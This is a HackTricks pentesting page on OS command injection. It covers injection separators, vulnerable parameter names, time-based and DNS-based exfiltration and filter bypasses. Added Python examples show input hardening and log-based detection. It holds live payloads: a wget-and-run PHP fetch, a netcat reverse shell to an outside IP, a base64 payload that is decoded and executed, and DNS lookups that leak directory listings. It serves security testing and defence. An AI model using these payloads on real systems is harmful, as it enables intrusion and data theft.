hacktricks/pentesting-web/command-injection.md
2024-02-10 17:52:19 +00:00

20 KiB

Command Injection

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

What is command Injection?

A command injection permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.

Context

Depending on where your input is being injected, you may need to terminate the quoted context (using " or ') before the commands.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute the 2nd only if the 1st finishes ok
ls&id; ls &id; ls& id; ls & id # Execute both, but you can only see the output of the 2nd
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
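As an added example (not code from the HackTricks page), here is where this bug usually comes from and what the fix looks like, written in Python for a hypothetical "ping this host" feature. The vulnerable form splices the parameter into one string that a shell parses, so every separator in the list above turns into a command boundary; the hardened form checks the parameter against an allowlist and passes an argv list with `shell=False`, so no shell ever sees the value. The function names, the `HOST_RE` pattern and the ping feature itself are assumptions made for the example.

```python
import re
import subprocess

# Allowlist for a hypothetical "host" parameter: an IPv4 dotted quad or a plain
# hostname. It cannot match a newline, ';', '|', '&', '`', '$(' or '${', so every
# operator from the list above is rejected before any command is built.
HOST_RE = re.compile(
    r"(?:\d{1,3}(?:\.\d{1,3}){3}"                               # IPv4
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"            # first hostname label
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)"     # further labels
)


def vulnerable_ping_command(host):
    """The injectable form: the raw parameter is spliced into one string that
    would be handed to /bin/sh (shell=True). It is returned, not executed, so
    the example can show exactly what the shell would receive."""
    return "ping -c 1 " + host


def is_valid_host(host):
    """True only when the whole value matches the allowlist."""
    return HOST_RE.fullmatch(host) is not None


def build_ping_argv(host):
    """The hardened form: reject anything outside the allowlist, then build an
    argv list. With a list and shell=False there is no shell to interpret
    separators, and the allowlist also stops a leading '-' being read as a flag."""
    if not is_valid_host(host):
        raise ValueError("rejected host parameter: %r" % (host,))
    return ["ping", "-c", "1", host]


def run_ping(host):
    """Execute the hardened form; returns ping's exit status."""
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, timeout=15).returncode


if __name__ == "__main__":
    # Constructed inputs: the first is legitimate, the rest use separators from the list above.
    for value in ["127.0.0.1", "127.0.0.1; id", "127.0.0.1\nid", "$(ls)", "ls${IFS}id"]:
        print("shell would get: %r" % vulnerable_ping_command(value))
        try:
            print("hardened argv  : %r" % build_ping_argv(value))
        except ValueError as exc:
            print("hardened argv  : %s" % exc)
```

The allowlist is the important part: a blocklist of the separators above is easy to miss one entry of (the `${IFS}` and `%0A` tricks exist precisely because blocklists forget them), whereas an argv list plus a strict pattern leaves nothing for the shell to parse.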

Limitation Bypasses

If you are trying to execute arbitrary commands inside a Linux machine, you will be interested in reading about these bypasses:

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Extracting data: char by char

Description

Time-based data exfiltration is a technique used to extract data from a target system by sending requests that cause delays in the response time. This can be useful in scenarios where direct data leakage is not possible, but an attacker can still exploit vulnerabilities to extract information.

One approach to time-based data exfiltration is extracting data character by character. This involves sending requests that extract one character at a time from the target system's database or file system. By carefully crafting the requests and measuring the response time, an attacker can reconstruct the desired data.

Methodology

  1. Identify the injection point: Find a vulnerable parameter where command injection is possible. This could be in a web application's input field, URL parameter, or any other user-controllable input.

  2. Determine the character set: Understand the character set used by the target system's database or file system. This could be ASCII, Unicode, or any other encoding scheme.

  3. Extract one character at a time: Craft a payload that extracts one character at a time from the target system. For example, in SQL injection, you can use the SUBSTRING() function to extract a specific character at a given position.

  4. Measure the response time: Send the crafted payload and measure the response time. If the response time is significantly longer for a specific character, it indicates that the character is present in the target system.

  5. Repeat the process: Iterate through all possible characters in the character set and extract the entire data by combining the characters that are present in the target system.

Example

Let's consider a web application that takes user input and performs a command execution without proper input validation. The vulnerable parameter is the username field, which is susceptible to command injection.

The attacker can craft a payload like the following to extract the username character by character:

' UNION SELECT CASE WHEN (SUBSTRING((SELECT username FROM users LIMIT 1),1,1)='a') THEN pg_sleep(10) ELSE pg_sleep(0) END --

By measuring the response time, the attacker can determine if the first character of the username is 'a'. By repeating this process for all possible characters, the attacker can extract the entire username.

Mitigation

To prevent time-based data exfiltration, it is important to implement proper input validation and sanitization techniques. Here are some mitigation measures:

  • Use parameterized queries or prepared statements to prevent SQL injection attacks.
  • Validate and sanitize user input to prevent command injection.
  • Implement rate limiting or request throttling to detect and block suspicious requests.
  • Regularly update and patch software to fix known vulnerabilities.
  • Implement a web application firewall (WAF) to detect and block malicious requests.

By following these best practices, you can significantly reduce the risk of time-based data exfiltration attacks.

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s
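The following is an added example written from the detection side; it is not part of the original page. It runs over a few constructed access-log lines (combined log format with one extra trailing field, the request duration in seconds) and flags any query value that carries one of the shell separators from the injection list, raises the severity when the parameter name is one of the 25 names listed above, and marks a hit as a probable time-based probe when the value contains `sleep` and the request stalled for several seconds, which is the server-side trace of the `time if [ ... ]; then sleep 5; fi` session shown just above. The log format, the `SAMPLE_LOG` lines and the `SLOW_SECONDS` threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not taken from any real server): combined log format
# with one extra trailing field, the request duration in seconds.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2024:17:52:19 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 512 0.004',
    '10.0.0.5 - - [10/Feb/2024:17:52:20 +0000] "GET /ping?host=127.0.0.1%0Aid HTTP/1.1" 200 812 0.006',
    '10.0.0.5 - - [10/Feb/2024:17:52:21 +0000] "GET /ping?cmd=ls%7C%7Cid HTTP/1.1" 200 612 0.005',
    '10.0.0.5 - - [10/Feb/2024:17:52:30 +0000] "GET /ping?host=127.0.0.1;sleep%205 HTTP/1.1" 200 512 5.011',
    '10.0.0.9 - - [10/Feb/2024:17:52:31 +0000] "GET /search?query=command+injection HTTP/1.1" 200 2048 0.031',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<secs>[\d.]+)$'
)

# The 25 parameter names from the list above.
SUSPECT_PARAMS = {
    "cmd", "exec", "command", "execute", "ping", "query", "jump", "code", "reg",
    "do", "func", "arg", "option", "load", "process", "step", "read", "function",
    "req", "feature", "exe", "module", "payload", "run", "print",
}

# The separators from the injection list: ||, &&, |, &, ;, newline (%0A), backticks,
# $( and ${, plus the redirections > and <.
SHELL_OPERATOR_RE = re.compile(r"\|\||&&|\$\(|\$\{|[|&;`\n<>]")

SLOW_SECONDS = 3.0  # assumed threshold for "this request stalled"


def decode_query(query):
    """Split a raw query string on '&' and percent-decode names and values.
    A literal '&' in the URL is a separator for the server as well, so an
    injected '&' that reached the command would appear in the log as '%26'."""
    pairs = []
    for chunk in query.split("&"):
        if not chunk:
            continue
        name, _, value = chunk.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def find_operators(value):
    """Sorted, de-duplicated list of shell separators present in a decoded value."""
    return sorted(set(SHELL_OPERATOR_RE.findall(value)))


def analyze_line(line):
    """Return one finding per parameter value that carries a shell operator."""
    m = LOG_RE.match(line)
    if m is None:
        return []
    query = m.group("target").partition("?")[2]
    secs = float(m.group("secs"))
    findings = []
    for name, value in decode_query(query):
        ops = find_operators(value)
        if not ops:
            continue
        findings.append({
            "ip": m.group("ip"),
            "param": name,
            "value": value,
            "operators": ops,
            "severity": "high" if name.lower() in SUSPECT_PARAMS else "medium",
            "time_based": "sleep" in value.lower() and secs >= SLOW_SECONDS,
        })
    return findings


def analyze(lines):
    findings = []
    for line in lines:
        findings.extend(analyze_line(line))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Decoding before matching matters: `%0A` and `%7C%7C` are harmless as text and only become a newline and `||` once the server decodes them, so a rule that inspects the raw URL misses exactly the encoded form the page recommends. The duration field is what separates a time-based probe from an ordinary slow request; without it the `sleep` payload looks like any other hit.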

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
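An added example, not from the page and not part of dnsbin: a small Python analyzer over constructed resolver-log lines that flags the two query patterns the commands above leave behind, a burst of distinct first labels under one suffix (one lookup per `ls /` entry) and a single very long label (a whole `wget -h` line squeezed into a name). The log format (`<epoch> <client> <qname>`), the thresholds and the sample lines are assumptions; the `3a43c7e4e57a8d0e2057.d.zhack.ca` suffix is the one used in the command above.

```python
from collections import Counter

# Constructed resolver log (not from any real system): "<epoch> <client> <qname>".
SAMPLE_DNS_LOG = [
    "1707587539 10.0.0.5 www.example.com",
    "1707587539 10.0.0.5 mail.example.com",
    "1707587540 10.0.0.5 bin.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587540 10.0.0.5 boot.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587540 10.0.0.5 dev.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587541 10.0.0.5 etc.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587541 10.0.0.5 home.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587541 10.0.0.5 lib.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587542 10.0.0.5 opt.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587542 10.0.0.5 root.3a43c7e4e57a8d0e2057.d.zhack.ca",
    "1707587550 10.0.0.9 api.example.com",
    # Constructed stand-in for a tool banner stuffed into one label.
    "1707587551 10.0.0.9 wget-1-21-4-built-on-linux-gnu-non-interactive-retriever.sudo.co.il",
]

MIN_UNIQUE = 5        # distinct first labels under one suffix within the window
WINDOW_SECONDS = 60   # sliding window for the burst heuristic
MAX_LABEL_LEN = 30    # a single label longer than this is worth a look


def parse_line(line):
    ts, client, qname = line.split()
    return int(ts), client, qname.rstrip(".").lower().split(".")


def detect_dns_exfil(lines, min_unique=MIN_UNIQUE, window=WINDOW_SECONDS,
                     max_label_len=MAX_LABEL_LEN):
    """Return findings for long labels and for bursts of unique subdomains,
    grouped per (client, suffix) where suffix is the qname minus its first label."""
    events = {}
    findings = []
    for line in lines:
        ts, client, labels = parse_line(line)
        if len(labels) < 3:
            continue
        first, suffix = labels[0], ".".join(labels[1:])
        if len(first) > max_label_len:
            findings.append({"client": client, "suffix": suffix,
                             "reason": "long-label", "detail": first})
        events.setdefault((client, suffix), []).append((ts, first))

    for (client, suffix), evs in events.items():
        evs.sort()
        in_window = Counter()   # label -> occurrences inside the sliding window
        left = 0
        peak = 0
        for ts, label in evs:
            in_window[label] += 1
            while evs[left][0] < ts - window:   # drop events older than the window
                old = evs[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= min_unique:
            findings.append({"client": client, "suffix": suffix,
                             "reason": "many-unique-subdomains", "detail": peak})
    return findings


if __name__ == "__main__":
    for finding in detect_dns_exfil(SAMPLE_DNS_LOG):
        print(finding)
```

Grouping on "everything but the first label" is what makes the `ls /` loop visible: each file name becomes a fresh label under a suffix the organisation never queried before, so the unique-label count climbs with every iteration while legitimate zones stay flat. In production the same counters are usually kept per registered domain (using a public-suffix list) rather than per raw suffix.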

Online tools to check for DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

{% content-ref url="../linux-hardening/useful-linux-commands/bypass-bash-restrictions.md" %} bypass-bash-restrictions.md {% endcontent-ref %}

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_injection.txt" %}
